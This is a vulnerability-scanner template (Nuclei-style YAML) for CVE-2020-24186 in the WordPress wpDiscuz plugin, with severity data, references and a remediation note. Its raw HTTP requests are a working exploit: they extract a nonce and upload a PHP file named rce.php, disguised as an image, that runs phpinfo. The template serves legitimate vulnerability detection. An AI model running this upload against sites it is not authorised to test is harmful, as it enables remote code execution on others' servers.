99 lines
3.3 KiB
YAML
99 lines
3.3 KiB
YAML
id: CVE-2020-24186
|
|
|
|
info:
|
|
name: WordPress wpDiscuz <=7.0.4 - Remote Code Execution
|
|
author: Ganofins
|
|
severity: critical
|
|
description: WordPress wpDiscuz plugin versions version 7.0 through 7.0.4 are susceptible to remote code execution. This flaw gave unauthenticated attackers the ability to upload arbitrary files, including PHP files, and achieve remote code execution on a vulnerable site's server.
|
|
remediation: |
|
|
Update the wpDiscuz plugin to the latest version (>=7.0.5) to mitigate this vulnerability.
|
|
reference:
|
|
- https://github.com/suncsr/wpDiscuz_unauthenticated_arbitrary_file_upload/blob/main/README.md
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2020-24186
|
|
- https://www.wordfence.com/blog/2020/07/critical-arbitrary-file-upload-vulnerability-patched-in-wpdiscuz-plugin/
|
|
- http://packetstormsecurity.com/files/162983/WordPress-wpDiscuz-7.0.4-Shell-Upload.html
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
|
|
cvss-score: 10
|
|
cve-id: CVE-2020-24186
|
|
cwe-id: CWE-434
|
|
epss-score: 0.97438
|
|
epss-percentile: 0.99929
|
|
cpe: cpe:2.3:a:gvectors:wpdiscuz:*:*:*:*:*:wordpress:*:*
|
|
metadata:
|
|
max-request: 2
|
|
vendor: gvectors
|
|
product: wpdiscuz
|
|
framework: wordpress
|
|
tags: rce,fileupload,packetstorm,cve,cve2020,wordpress,wp-plugin,intrusive
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
GET /?p=1 HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Accept: */*
|
|
- |
|
|
POST /wp-admin/admin-ajax.php HTTP/1.1
|
|
Host: {{Hostname}}
|
|
X-Requested-With: XMLHttpRequest
|
|
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary88AhjLimsDMHU1Ak
|
|
Origin: {{BaseURL}}
|
|
Referer: {{BaseURL}}
|
|
|
|
------WebKitFormBoundary88AhjLimsDMHU1Ak
|
|
Content-Disposition: form-data; name="action"
|
|
|
|
wmuUploadFiles
|
|
------WebKitFormBoundary88AhjLimsDMHU1Ak
|
|
Content-Disposition: form-data; name="wmu_nonce"
|
|
|
|
{{wmuSecurity}}
|
|
------WebKitFormBoundary88AhjLimsDMHU1Ak
|
|
Content-Disposition: form-data; name="wmuAttachmentsData"
|
|
|
|
undefined
|
|
------WebKitFormBoundary88AhjLimsDMHU1Ak
|
|
Content-Disposition: form-data; name="wmu_files[0]"; filename="rce.php"
|
|
Content-Type: image/png
|
|
|
|
{{base64_decode('/9j/4WpFeGlmTU0q/f39af39Pv39/f39/f39/f2o/f39/cD9/f39/f39/f39/f/g/UpGSUb9/f39/9tD/f0M/QwK/f0=')}}
|
|
<?php phpinfo();?>
|
|
------WebKitFormBoundary88AhjLimsDMHU1Ak
|
|
Content-Disposition: form-data; name="postId"
|
|
|
|
1
|
|
------WebKitFormBoundary88AhjLimsDMHU1Ak--
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- 'success":true'
|
|
- 'fullname'
|
|
- 'shortname'
|
|
- 'url'
|
|
condition: and
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
|
|
extractors:
|
|
- type: regex
|
|
name: wmuSecurity
|
|
group: 1
|
|
regex:
|
|
- 'wmuSecurity":"([a-z0-9]+)'
|
|
internal: true
|
|
part: body
|
|
|
|
- type: regex
|
|
group: 1
|
|
regex:
|
|
- '"url":"([a-z:\\/0-9-.]+)"'
|
|
part: body
|
|
|
|
# digest: 4a0a0047304502203277feb2d48d234c58e63406cafcf232135caa142b1f42708a5c4ab99c54ab57022100c1a2c862e6234a866ee923a2573be36e7d3e4b7d5b7748eb262f887b0db6b0ea:922c64590222798bb761d5b6d8e72950
|